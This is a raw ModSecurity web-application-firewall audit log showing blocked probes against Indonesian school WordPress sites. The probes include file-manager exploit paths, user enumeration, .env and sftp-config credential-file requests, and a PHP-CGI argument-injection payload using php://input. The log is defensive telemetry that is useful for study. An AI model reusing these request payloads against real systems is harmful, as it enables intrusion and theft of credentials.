Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2085ac37-Z-- --ef30a96c-A-- [28/May/2025:11:02:13 +0700] aDaKxfnnEwDNUSjDseIR4gAAAIw 103.236.140.4 51786 103.236.140.4 8181 --ef30a96c-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 143.198.94.52 Accept-Encoding: gzip X-Varnish: 169224220 --ef30a96c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ef30a96c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748404933242200 2734 (- - -) Stopwatch2: 1748404933242200 2734; combined=1501, p1=400, p2=1075, p3=0, p4=0, p5=26, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef30a96c-Z-- --28d14444-A-- [28/May/2025:11:02:13 +0700] aDaKxfnnEwDNUSjDseIR4wAAAI8 103.236.140.4 51786 103.236.140.4 8181 --28d14444-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 143.198.94.52 Accept-Encoding: gzip X-Varnish: 163570859 --28d14444-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --28d14444-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748404933343228 2853 (- - -) Stopwatch2: 1748404933343228 2853; combined=1480, p1=349, p2=1103, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28d14444-Z-- --61f2b65e-A-- [28/May/2025:11:02:33 +0700] aDaK2eszXCullgn3bbGiZAAAABA 103.236.140.4 51840 103.236.140.4 8181 --61f2b65e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 160.19.138.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.19.138.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --61f2b65e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61f2b65e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748404953158078 3414 (- - -) Stopwatch2: 1748404953158078 3414; combined=1484, p1=515, p2=924, p3=0, p4=0, p5=44, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61f2b65e-Z-- --064bf31e-A-- [28/May/2025:11:03:34 +0700] aDaLFg3r-0gDryHAyD--_QAAAE8 103.236.140.4 52038 103.236.140.4 8181 --064bf31e-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 124.243.188.55 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.243.188.55 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24 Proxy-Connection: close --064bf31e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --064bf31e-H-- Message: Access denied with code 403 (phase 2). Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||smkn22-jkt.sch.id|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748405014026064 2902 (- - -) Stopwatch2: 1748405014026064 2902; combined=1072, p1=497, p2=541, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --064bf31e-Z-- --649c3246-A-- [28/May/2025:11:14:52 +0700] aDaNvPnnEwDNUSjDseISDQAAAIM 103.236.140.4 52106 103.236.140.4 8181 --649c3246-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.59.17.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --649c3246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --649c3246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748405692628070 2984 (- - -) Stopwatch2: 1748405692628070 2984; combined=1300, p1=431, p2=834, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --649c3246-Z-- --201fbb7a-A-- [28/May/2025:11:29:12 +0700] aDaRGA3r-0gDryHAyD-_HgAAAEE 103.236.140.4 52410 103.236.140.4 8181 --201fbb7a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.232.225.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.232.225.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --201fbb7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --201fbb7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748406552837293 3678 (- - -) Stopwatch2: 1748406552837293 3678; combined=1615, p1=542, p2=1037, p3=0, p4=0, p5=36, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --201fbb7a-Z-- --01dc1767-A-- [28/May/2025:11:32:00 +0700] aDaRwOszXCullgn3bbGijQAAAAo 103.236.140.4 52586 103.236.140.4 8181 --01dc1767-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.137.188.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.137.188.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --01dc1767-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01dc1767-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748406720627939 2712 (- - -) Stopwatch2: 1748406720627939 2712; combined=1227, p1=426, p2=771, p3=0, p4=0, p5=29, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01dc1767-Z-- --787d2d15-A-- [28/May/2025:11:46:18 +0700] aDaVGhwBHP_x2VCWa05-EAAAAMI 103.236.140.4 52714 103.236.140.4 8181 --787d2d15-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --787d2d15-C-- --787d2d15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --787d2d15-E-- --787d2d15-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748407578952917 4252 (- - -) Stopwatch2: 1748407578952917 4252; combined=2585, p1=477, p2=2068, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --787d2d15-Z-- --18f27b24-A-- [28/May/2025:11:47:43 +0700] aDaVbxwBHP_x2VCWa05-EQAAAM0 103.236.140.4 52720 103.236.140.4 8181 --18f27b24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.240.193.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.240.193.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --18f27b24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18f27b24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748407663269917 3348 (- - -) Stopwatch2: 1748407663269917 3348; combined=1513, p1=523, p2=958, p3=0, p4=0, p5=31, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18f27b24-Z-- --a8a91277-A-- [28/May/2025:11:59:17 +0700] aDaYJRwBHP_x2VCWa05-IgAAANY 103.236.140.4 52812 103.236.140.4 8181 --a8a91277-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.189.19.19 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a8a91277-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8a91277-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748408357275901 726 (- - -) Stopwatch2: 1748408357275901 726; combined=280, p1=242, p2=0, p3=0, p4=0, p5=37, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8a91277-Z-- --8e474d09-A-- [28/May/2025:12:12:53 +0700] aDabVfnnEwDNUSjDseISuAAAAJE 103.236.140.4 53938 103.236.140.4 8181 --8e474d09-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --8e474d09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e474d09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748409173124910 790 (- - -) Stopwatch2: 1748409173124910 790; combined=297, p1=259, p2=0, p3=0, p4=0, p5=38, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e474d09-Z-- --b8a46f0a-A-- [28/May/2025:12:33:48 +0700] aDagPA3r-0gDryHAyD_EYwAAAFE 103.236.140.4 36000 103.236.140.4 8181 --b8a46f0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.153.19.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.153.19.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b8a46f0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8a46f0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748410428309337 3677 (- - -) Stopwatch2: 1748410428309337 3677; combined=1655, p1=553, p2=1054, p3=0, p4=0, p5=48, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8a46f0a-Z-- --b04f304e-A-- [28/May/2025:13:35:26 +0700] aDaurvnnEwDNUSjDseIWOAAAAIg 103.236.140.4 36360 103.236.140.4 8181 --b04f304e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.36.206.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.36.206.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b04f304e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b04f304e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748414126141257 3580 (- - -) Stopwatch2: 1748414126141257 3580; combined=1509, p1=538, p2=938, p3=0, p4=0, p5=32, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b04f304e-Z-- --ca709025-A-- [28/May/2025:13:38:22 +0700] aDavXuszXCullgn3bbGmQAAAAAE 103.236.140.4 36400 103.236.140.4 8181 --ca709025-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ca709025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca709025-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748414302532560 895 (- - -) Stopwatch2: 1748414302532560 895; combined=366, p1=332, p2=0, p3=0, p4=0, p5=34, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca709025-Z-- --c3513e32-A-- [28/May/2025:13:52:03 +0700] aDaykw3r-0gDryHAyD_EqQAAAEI 103.236.140.4 36490 103.236.140.4 8181 --c3513e32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.183.83.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.183.83.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c3513e32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3513e32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748415123354077 2862 (- - -) Stopwatch2: 1748415123354077 2862; combined=1183, p1=417, p2=741, p3=0, p4=0, p5=25, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3513e32-Z-- --8739314d-A-- [28/May/2025:14:16:12 +0700] aDa4PPnnEwDNUSjDseIWSwAAAIc 103.236.140.4 36606 103.236.140.4 8181 --8739314d-B-- GET /sftp-config.json HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 51.44.7.141 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 51.44.7.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --8739314d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8739314d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748416572763467 938 (- - -) Stopwatch2: 1748416572763467 938; combined=352, p1=310, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8739314d-Z-- --692fec6f-A-- [28/May/2025:14:31:43 +0700] aDa73xwBHP_x2VCWa06BtgAAAMI 103.236.140.4 36710 103.236.140.4 8181 --692fec6f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.182.137.182 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.182.137.182 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --692fec6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --692fec6f-H-- Message: Access denied with code 403 (phase 1). 
